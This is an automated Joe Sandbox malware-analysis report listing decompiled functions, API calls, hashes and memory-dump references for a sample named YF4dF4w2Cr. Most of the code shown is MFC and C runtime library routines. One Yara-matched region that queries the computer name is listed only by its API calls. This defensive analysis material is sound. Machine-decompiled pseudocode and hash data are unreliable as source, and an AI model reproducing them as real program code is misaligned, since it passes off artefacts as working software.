                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ViewportWindow
                  • String ID:
                  • API String ID: 1589084482-0
                  • Opcode ID: 78baa2dcdd5e57f3b1789fedd9b210cdbd5642a15fe81d21b903267fcd350980
                  • Instruction ID: 664b9ddbefff46f4c3d2c833485c23bbeb90989938057a150765868531f8da2f
                  • Opcode Fuzzy Hash: 78baa2dcdd5e57f3b1789fedd9b210cdbd5642a15fe81d21b903267fcd350980
                  • Instruction Fuzzy Hash: A9016D75900619FFDF21DB95DC49FAEBBB9FF08700F0044A9F166A21A0D771AA50DB18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00417D95, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00417D95() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E00412C76(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E004177E3(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E00431B73(_t16);
			}








                  0x00417d95
                  0x00417d98
                  0x00417da0
                  0x00417da6
                  0x00417da6
                  0x00417dae
                  0x00417db5
                  0x00417db5
                  0x00417dbe
                  0x00417dc0
                  0x00417dc6
                  0x00417dc9
                  0x00417dce
                  0x00417dce
                  0x00417dc9
                  0x00417dd8
                  0x00417ddd
                  0x00417de5
                  0x00417dea
                  0x00417dea
                  0x00417df0
                  0x00417df8

                  APIs
                  • EnableWindow.USER32(?,00000001), ref: 00417DB5
                  • GetActiveWindow.USER32 ref: 00417DC0
                  • SetActiveWindow.USER32(?,?,00000024,00401950), ref: 00417DCE
                  • FreeResource.KERNEL32(?,?,00000024,00401950), ref: 00417DEA
                    • Part of subcall function 00412C76: EnableWindow.USER32(?,?), ref: 00412C87
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$ActiveEnable$FreeResource
                  • String ID:
                  • API String ID: 253586258-0
                  • Opcode ID: f76e8db3d813109722854849c1a9a733376dd28df11c01fbb442b94c52c1e73b
                  • Instruction ID: 03228c99fea0e0c6e85cead79c0e6d7fcf9e400b22d77e7c5b5f114df3b57783
                  • Opcode Fuzzy Hash: f76e8db3d813109722854849c1a9a733376dd28df11c01fbb442b94c52c1e73b
                  • Instruction Fuzzy Hash: A2F04F34900608CFCF22AF55D8455EEB7B2BF48705F61042AE401732A0DB3A6C81CF59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00439212, Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E00439212(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x45e250);
				E00431818(__ebx, __edi, __esi);
				_t28 = E00436178(__ebx, __edx, __edi, _t30);
				_t13 =  *0x463b44; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0043A0BF(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x463c28; // 0x24310f8
					 *((intOrPtr*)(_t29 - 0x1c)) = E004391D4(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E0043927C();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00436178(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0043395F(_t25, _t26, 0x20);
				}
				return E0043185D(_t28);
			}







                  0x00439212
                  0x00439212
                  0x00439212
                  0x00439212
                  0x00439212
                  0x00439214
                  0x00439219
                  0x00439223
                  0x00439225
                  0x0043922d
                  0x00439251
                  0x00439253
                  0x00439259
                  0x0043925d
                  0x00439260
                  0x0043926b
                  0x0043926e
                  0x00439275
                  0x0043922f
                  0x0043922f
                  0x00439233
                  0x00000000
                  0x00439235
                  0x0043923a
                  0x0043923a
                  0x00439233
                  0x0043923f
                  0x00439243
                  0x00439248
                  0x00439250

                  APIs
                  • __getptd.LIBCMT ref: 0043921E
                    • Part of subcall function 00436178: __getptd_noexit.LIBCMT ref: 0043617B
                    • Part of subcall function 00436178: __amsg_exit.LIBCMT ref: 00436188
                  • __getptd.LIBCMT ref: 00439235
                  • __amsg_exit.LIBCMT ref: 00439243
                  • __lock.LIBCMT ref: 00439253
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                  • String ID:
                  • API String ID: 3521780317-0
                  • Opcode ID: 8ff576b7292c7b5a6182514ef2947974fe8b5604b36264260ed5e964655f9010
                  • Instruction ID: db5eb218aed7cb5d1a392201fe744ead5517e1896f3a1eef3f233cd93dbba6bc
                  • Opcode Fuzzy Hash: 8ff576b7292c7b5a6182514ef2947974fe8b5604b36264260ed5e964655f9010
                  • Instruction Fuzzy Hash: 96F06232540701AADB64FF66880274E72A05B0D725F11695FE841672D3CBBC9D009B5E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00433D24, Relevance: 6.0, APIs: 4, Instructions: 19threadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E00433D24(long _a4) {
				void* _t6;
				void* _t9;
				void* _t10;

				_t11 =  *0x455828;
				if( *0x455828 != 0 && E0043BEC0(_t11, 0x455828) != 0) {
					 *0x455828();
				}
				if(E004360FF(_t6) != 0) {
					E004362C1(_t6, _t9, _t10, _t2);
				}
				ExitThread(_a4);
			}






                  0x00433d29
                  0x00433d30
                  0x00433d41
                  0x00433d41
                  0x00433d4e
                  0x00433d51
                  0x00433d56
                  0x00433d5a

                  APIs
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00433D37
                    • Part of subcall function 0043BEC0: __FindPESection.LIBCMT ref: 0043BF1B
                  • __getptd_noexit.LIBCMT ref: 00433D47
                  • __freeptd.LIBCMT ref: 00433D51
                  • ExitThread.KERNEL32 ref: 00433D5A
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                  • String ID:
                  • API String ID: 3182216644-0
                  • Opcode ID: 13fc4c004ad8bcee29e09d0495723f2b115e4a7f899d87b3f245987b306b9f3f
                  • Instruction ID: 203174fa76400e9e4076759861b9462e5eb240b4f1b68f0b49cf1372757bfa21
                  • Opcode Fuzzy Hash: 13fc4c004ad8bcee29e09d0495723f2b115e4a7f899d87b3f245987b306b9f3f
                  • Instruction Fuzzy Hash: FDD0123500070566DA153B66EC1F73B3E98DB48727F65503AB504841A3DF6DC991C99C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041365C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123COMMON
                  Download Yara Rule
                  C-Code - Quality: 64%
                  			E0041365C(void* __ecx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct tagRECT _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t48;
				intOrPtr _t55;
				signed int _t69;
				intOrPtr* _t73;
				void* _t76;
				intOrPtr _t82;
				signed int _t86;
				intOrPtr _t87;
				void* _t89;
				signed int _t91;
				void* _t93;
				void* _t95;
				void* _t96;
				void* _t106;

				_t74 = __ecx;
				_t95 = __ecx;
				_t48 = 0;
				_t97 = __ecx;
				if(__ecx != 0) {
					L2:
					if(_a4 == _t48) {
						goto L1;
					}
					_t91 =  *(_t95 + 0x84) & 0x0000a000;
					_v16 = _t48;
					_v12 = _t48;
					_v20 = _t48;
					_v8 = _t48;
					if( *((intOrPtr*)(_t95 + 0xa4)) <= _t48) {
						L24:
						_push(1);
						_t93 = _v16 + 1;
						_t96 = _t95 + 0x9c;
						_push(_t48);
						E004260F4(_t73, _t96, _t93, _t93);
						_t76 = _t96;
						L25:
						_push(1);
						_t42 =  &_a4; // 0x414326
						_push( *_t42);
						E004260F4(_t73, _t76, _t93, _t93);
						return _t93;
					} else {
						goto L4;
					}
					do {
						L4:
						_t73 = E00413638(_t95, _v8);
						if(_t73 == 0) {
							_t28 =  &_v12; // 0x414326
							_v12 = 0;
							_v20 = _v20 +  *_t28 -  *0x466524;
							_t55 = _a28;
							__eflags = _t91;
							if(_t91 == 0) {
								_t55 = _a24;
							}
							__eflags = _t55 - _v20;
							if(_t55 < _v20) {
								__eflags = _v8;
								if(_v8 == 0) {
									_push(1);
									_push(0);
									__eflags = _v16 + 1;
									E004260F4(_t73, _t95 + 0x9c, _t91, _v16 + 1);
								}
								_t93 = _v16 + 1;
								_t76 = _t95 + 0x9c;
								goto L25;
							} else {
								L21:
								_v16 = _v8;
								goto L22;
							}
						}
						if( *((intOrPtr*)( *_t73 + 0x168))() == 0) {
							goto L22;
						}
						GetWindowRect( *(_t73 + 0x20),  &_v36);
						E00422BFB(_t95,  &_v36);
						_t82 = _v36.right;
						_t87 = _v36.bottom;
						if(_t91 == 0) {
							_t69 = _t82 - _v36.left - 1;
							__eflags = _t69;
						} else {
							_t69 = _t87 - _v36.top;
						}
						if(_v12 <= _t69) {
							if(_t91 == 0) {
								_t86 = _t82 - _v36.left - 1;
								__eflags = _t86;
								_v12 = _t86;
							} else {
								_v12 = _t87 - _v36.top;
							}
						}
						if(_t91 == 0) {
							__eflags = _a12 - _v36.top;
						} else {
							_t106 = _a8 - _v36.left;
						}
						if((0 | _t106 > 0x00000000) != 0) {
							goto L21;
						}
						L22:
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t95 + 0xa4)));
					_t48 = 0;
					goto L24;
				}
				L1:
				_t48 = E00406436(_t73, _t74, _t89, _t95, _t97);
				goto L2;
			}


























                  0x0041365c
                  0x00413666
                  0x00413668
                  0x0041366b
                  0x0041366d
                  0x00413674
                  0x00413677
                  0x00000000
                  0x00000000
                  0x0041367f
                  0x0041368b
                  0x0041368e
                  0x00413691
                  0x00413694
                  0x00413697
                  0x0041375d
                  0x00413760
                  0x00413762
                  0x00413763
                  0x00413769
                  0x0041376d
                  0x00413772
                  0x00413774
                  0x00413774
                  0x00413776
                  0x00413776
                  0x0041377a
                  0x00413785
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041369d
                  0x0041369d
                  0x004136a7
                  0x004136ad
                  0x00413725
                  0x0041372e
                  0x00413731
                  0x00413734
                  0x00413737
                  0x00413739
                  0x0041373b
                  0x0041373b
                  0x0041373e
                  0x00413741
                  0x00413788
                  0x0041378b
                  0x00413790
                  0x00413792
                  0x00413793
                  0x0041379b
                  0x0041379b
                  0x004137a3
                  0x004137a4
                  0x00000000
                  0x00413743
                  0x00413743
                  0x00413746
                  0x00000000
                  0x00413746
                  0x00413741
                  0x004136bb
                  0x00000000
                  0x00000000
                  0x004136c8
                  0x004136d4
                  0x004136d9
                  0x004136dc
                  0x004136e1
                  0x004136ef
                  0x004136ef
                  0x004136e3
                  0x004136e5
                  0x004136e5
                  0x004136f3
                  0x004136f7
                  0x00413704
                  0x00413704
                  0x00413705
                  0x004136f9
                  0x004136fc
                  0x004136fc
                  0x004136f7
                  0x0041370c
                  0x00413719
                  0x0041370e
                  0x00413711
                  0x00413711
                  0x00413721
                  0x00000000
                  0x00413723
                  0x00413749
                  0x00413749
                  0x0041374f
                  0x0041375b
                  0x00000000
                  0x0041375b
                  0x0041366f
                  0x0041366f
                  0x00000000

                  APIs
                  • GetWindowRect.USER32 ref: 004136C8
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Exception@8H_prolog3RectThrowWindow
                  • String ID: &CA$&CA
                  • API String ID: 3517363987-339850520
                  • Opcode ID: a56d8a55cfae5af6352e97de880f8e6a5960eb7f6f67abfc6bdadb55ace455b2
                  • Instruction ID: 4f4a0c8e80f02a4d6620a452c76b11ac0f5120761df8692bc9f0a1959f1c83b8
                  • Opcode Fuzzy Hash: a56d8a55cfae5af6352e97de880f8e6a5960eb7f6f67abfc6bdadb55ace455b2
                  • Instruction Fuzzy Hash: 06414FB5A00219EFCF14DFA8C980AEEB7B5BB44301F15816EE416E7380DB789E81CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042DE22, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMON
                  Download Yara Rule
                  C-Code - Quality: 96%
                  			E0042DE22(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, CHAR* _a8, signed int _a12, intOrPtr _a16) {
				struct tagRECT _v20;
				char* _v28;
				signed int _v36;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t36;
				void* _t42;
				void* _t50;
				intOrPtr* _t57;
				void* _t65;
				signed int _t66;
				intOrPtr* _t69;
				void* _t72;

				_t72 = __eflags;
				_t65 = __edx;
				_t66 = _a12;
				_t69 = __ecx;
				 *(__ecx + 0x84) = _t66 & 0x0040ffff;
				E00431160(_t66,  &_v68, 0, 0x30);
				_v28 = "AfxControlBar90s";
				_v36 = _t66 | 0x40000000;
				_v60 = _a16;
				_v64 =  *((intOrPtr*)(E0041F363(0, _t66 | 0x40000000, _t69, _t72) + 8));
				_t36 = _a4;
				if(_t36 != 0) {
					_v56 =  *((intOrPtr*)(_t36 + 0x20));
				} else {
					_v56 = 0;
				}
				_push( &_v68);
				_t57 = _t69;
				if( *((intOrPtr*)( *_t69 + 0x64))() != 0) {
					_t68 = _a8;
					 *((intOrPtr*)(_t69 + 0xa4)) = _a8;
					E00411F96(0, _t57, _a8, _t69, __eflags, 0x10);
					E00411F96(0, _t57, _t68, _t69, __eflags, 0x3c000);
					_t42 = E00417E26(_t69, _t65, __eflags, _t68, _a4);
					 *((intOrPtr*)(_t69 + 0xa4)) = 0;
					__eflags = _t42;
					if(_t42 == 0) {
						goto L4;
					}
					E00412C0B(_t69, _a16);
					GetWindowRect( *(_t69 + 0x20),  &_v20);
					 *((intOrPtr*)(_t69 + 0x9c)) = _v20.bottom - _v20.top;
					 *((intOrPtr*)(_t69 + 0x98)) = _v20.right - _v20.left;
					E00412B6C(_t69, 0, 0x4000000, 0);
					_t50 = E004122AD(_t69, _t68);
					__eflags = _t50;
					if(_t50 == 0) {
						goto L4;
					}
					E00412D05(_t69, 0, 0, 0, 0, 0, 0x54);
					__eflags = 1;
					return 1;
				} else {
					L4:
					return 0;
				}
			}






















                  0x0042de22
                  0x0042de22
                  0x0042de2d
                  0x0042de37
                  0x0042de3b
                  0x0042de48
                  0x0042de59
                  0x0042de60
                  0x0042de63
                  0x0042de6e
                  0x0042de71
                  0x0042de76
                  0x0042de80
                  0x0042de78
                  0x0042de78
                  0x0042de78
                  0x0042de88
                  0x0042de89
                  0x0042de90
                  0x0042de99
                  0x0042de9e
                  0x0042dea4
                  0x0042deae
                  0x0042deb9
                  0x0042debe
                  0x0042dec4
                  0x0042dec6
                  0x00000000
                  0x00000000
                  0x0042decd
                  0x0042ded9
                  0x0042def1
                  0x0042defa
                  0x0042df00
                  0x0042df08
                  0x0042df0d
                  0x0042df0f
                  0x00000000
                  0x00000000
                  0x0042df1a
                  0x0042df21
                  0x00000000
                  0x0042de92
                  0x0042de92
                  0x00000000
                  0x0042de92

                  APIs
                  • _memset.LIBCMT ref: 0042DE48
                    • Part of subcall function 00411F96: _memset.LIBCMT ref: 00411FC6
                    • Part of subcall function 00417E26: FindResourceA.KERNEL32(?,?,00000005), ref: 00417E42
                    • Part of subcall function 00417E26: LoadResource.KERNEL32(?,00000000), ref: 00417E4A
                    • Part of subcall function 00417E26: LockResource.KERNEL32(00000000), ref: 00417E57
                    • Part of subcall function 00417E26: FreeResource.KERNEL32(00000000,00000000,?,?), ref: 00417E6F
                  • GetWindowRect.USER32 ref: 0042DED9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Resource$_memset$FindFreeLoadLockRectWindow
                  • String ID: AfxControlBar90s
                  • API String ID: 2572468386-4082281646
                  • Opcode ID: 8ef9e049ffa48c2aa6230c8892a9e22c2e9c0ae3b3c34c7fa8001824ef8db9a6
                  • Instruction ID: e5b2b79bd6c95d178e32231d7f74e943e7f72560d624d97ef41cbe9ba629f01b
                  • Opcode Fuzzy Hash: 8ef9e049ffa48c2aa6230c8892a9e22c2e9c0ae3b3c34c7fa8001824ef8db9a6
                  • Instruction Fuzzy Hash: C2317E71A00218AFDB10EFA5D985AAFBBB9AF44348F01442EF546E7251D7789D018B58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0231D163, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                  Download Yara Rule
                  APIs
                  • GetComputerNameW.KERNEL32(?,?), ref: 0231D179
                  • WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000), ref: 0231D1A6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharComputerMultiNameWide
                  • String ID: X
                  • API String ID: 4013585866-3081909835
                  • Opcode ID: fe8f466b7cf88bcb81779cf220beef56a044c43aa31c21a1a33b7f00b86316fc
                  • Instruction ID: 53cc2099476e6e33a7a0b22de51f471fb859cc21d8df43f59e37a8987a308a65
                  • Opcode Fuzzy Hash: fe8f466b7cf88bcb81779cf220beef56a044c43aa31c21a1a33b7f00b86316fc
                  • Instruction Fuzzy Hash: 46118C71D4110C6AEB38D6A89D44BEB77BEAF0B308F500026E945F61C0EB604A1B87A2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042F2FE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0042F2FE(void* __ecx, void* __eflags, intOrPtr _a4, signed int _a8) {
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t26;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				void* _t40;
				intOrPtr _t41;
				signed int _t42;
				void* _t43;

				_t39 = __ecx;
				_t43 = __ecx;
				_t26 = E0041F396(_t36, __ecx, _t40, __ecx, __eflags);
				_t41 =  *((intOrPtr*)(_t26 + 0x3c));
				if(_a4 != 0) {
					_t42 = _a8;
					__eflags =  *(__ecx + 0x3c) & _t42;
					if(__eflags == 0) {
						 *((intOrPtr*)(E0041F363(_t36, _t42, __ecx, __eflags) + 0x38)) = E0042F2EA;
						_t24 = _t43 + 0x3c;
						 *_t24 =  *(_t43 + 0x3c) | _t42;
						__eflags =  *_t24;
					}
				} else {
					_t37 = _a8;
					if(( *(__ecx + 0x3c) & _t37) != 0) {
						_t49 =  *((intOrPtr*)(_t26 + 0x40)) - __ecx;
						if( *((intOrPtr*)(_t26 + 0x40)) == __ecx) {
							E0040D89A(_t39, _t49, 1);
						}
						if(_t41 != 0 &&  *(_t41 + 0x20) != 0) {
							E00431160(_t41,  &_v52, 0, 0x30);
							_t32 =  *((intOrPtr*)(_t43 + 0x20));
							_v44 = _t32;
							_v40 = _t32;
							_v52 = 0x2c;
							_v48 = 1;
							SendMessageA( *(_t41 + 0x20), 0x405, 0,  &_v52);
						}
						 *(_t43 + 0x3c) =  *(_t43 + 0x3c) &  !_t37;
					}
				}
				return 1;
			}



















                  0x0042f2fe
                  0x0042f309
                  0x0042f30b
                  0x0042f314
                  0x0042f317
                  0x0042f379
                  0x0042f37c
                  0x0042f37f
                  0x0042f386
                  0x0042f38d
                  0x0042f38d
                  0x0042f38d
                  0x0042f38d
                  0x0042f319
                  0x0042f319
                  0x0042f31f
                  0x0042f321
                  0x0042f324
                  0x0042f328
                  0x0042f328
                  0x0042f32f
                  0x0042f33f
                  0x0042f344
                  0x0042f34a
                  0x0042f34d
                  0x0042f35e
                  0x0042f365
                  0x0042f36c
                  0x0042f36c
                  0x0042f374
                  0x0042f374
                  0x0042f31f
                  0x0042f397

                  APIs
                  • _memset.LIBCMT ref: 0042F33F
                  • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 0042F36C
                    • Part of subcall function 0040D89A: SendMessageA.USER32(?,00000401,00000000,00000000), ref: 0040D8BF
                    • Part of subcall function 0040D89A: GetKeyState.USER32(00000001), ref: 0040D8D4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$State_memset
                  • String ID: ,
                  • API String ID: 930327405-3772416878
                  • Opcode ID: 40101904e8074d280dcb2c4609b351c52c5efd4c9a9780d6c8a9c199d9d1a8af
                  • Instruction ID: 7c540c80431b337250ce6ddfd8c45ad52cb60da89bd9e6b3c434e6b46047bbb6
                  • Opcode Fuzzy Hash: 40101904e8074d280dcb2c4609b351c52c5efd4c9a9780d6c8a9c199d9d1a8af
                  • Instruction Fuzzy Hash: EE118F71A00714EFD720DFA2D885B9BB7B4FB44724F94403BE94566A81D3B9A848CF98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004295D3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 81%
                  			E004295D3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t24;
				_Unknown_base(*)()* _t25;
				void* _t28;
				signed int* _t47;
				void* _t48;
				void* _t49;
				void* _t50;

				_t50 = __eflags;
				_t43 = __edx;
				_push(4);
				E00431A9B(E0044C987, __ebx, __edi, __esi);
				_t47 =  *(_t49 + 0x10);
				 *_t47 =  *_t47 & 0x00000000;
				E00429544(_t50, _t49 - 0x10,  *((intOrPtr*)(_t49 + 8)));
				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
				_t34 = _t49 + 0x10;
				E004014C0(_t49 + 0x10, __edx);
				 *(_t49 - 4) = 1;
				if(E00428ECF(__ebx,  *((intOrPtr*)(_t49 - 0x10)), _t49 + 0x10) != 0) {
					_t45 =  *(_t49 + 0x10);
					_push( *(_t49 + 0x10));
					_t24 = E0040D5D6(__ebx, _t34,  *(_t49 + 0x10), _t47, __eflags);
					__eflags = _t24;
					if(_t24 != 0) {
						_t25 = GetProcAddress(_t24, "DllGetClassObject");
						__eflags = _t25;
						if(_t25 == 0) {
							_t48 = 0x800401f9;
						} else {
							_t48 =  *_t25( *((intOrPtr*)(_t49 + 8)),  *((intOrPtr*)(_t49 + 0xc)), _t47);
						}
					} else {
						_t48 = 0x80040154;
					}
					E004010B0(_t45 - 0x10, _t43);
					E004010B0( *((intOrPtr*)(_t49 - 0x10)) + 0xfffffff0, _t43);
					_t28 = _t48;
				} else {
					E004010B0( &(( *(_t49 + 0x10))[0xfffffffffffffffc]), __edx);
					E004010B0( *((intOrPtr*)(_t49 - 0x10)) + 0xfffffff0, __edx);
					_t28 = 0x80040154;
				}
				return E00431B73(_t28);
			}










                  0x004295d3
                  0x004295d3
                  0x004295d3
                  0x004295da
                  0x004295e2
                  0x004295e5
                  0x004295ec
                  0x004295f1
                  0x004295f5
                  0x004295f8
                  0x00429604
                  0x0042960f
                  0x00429634
                  0x00429637
                  0x00429638
                  0x0042963e
                  0x00429640
                  0x00429664
                  0x0042966a
                  0x0042966c
                  0x0042967b
                  0x0042966e
                  0x00429677
                  0x00429677
                  0x00429642
                  0x00429642
                  0x00429642
                  0x0042964a
                  0x00429655
                  0x0042965a
                  0x00429611
                  0x00429617
                  0x00429622
                  0x00429627
                  0x00429627
                  0x00429631

                  APIs
                  • __EH_prolog3.LIBCMT ref: 004295DA
                    • Part of subcall function 00429544: swprintf.LIBCMT ref: 004295AC
                    • Part of subcall function 00428ECF: RegOpenKeyA.ADVAPI32(80000000,CLSID,004542E8), ref: 00428F09
                    • Part of subcall function 00428ECF: RegOpenKeyA.ADVAPI32(00000000,00000000,00000000), ref: 00428F1D
                    • Part of subcall function 00428ECF: RegOpenKeyA.ADVAPI32(00000000,InProcServer32,?), ref: 00428F38
                    • Part of subcall function 00428ECF: RegQueryValueExA.ADVAPI32(?,0044F0F5,00000000,?,?,?), ref: 00428F52
                    • Part of subcall function 00428ECF: RegCloseKey.ADVAPI32(?), ref: 00428F62
                    • Part of subcall function 00428ECF: RegCloseKey.ADVAPI32(00000000), ref: 00428F67
                    • Part of subcall function 00428ECF: RegCloseKey.ADVAPI32(?), ref: 00428F6C
                  • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 00429664
                  Strings
                  Memory Dump Source
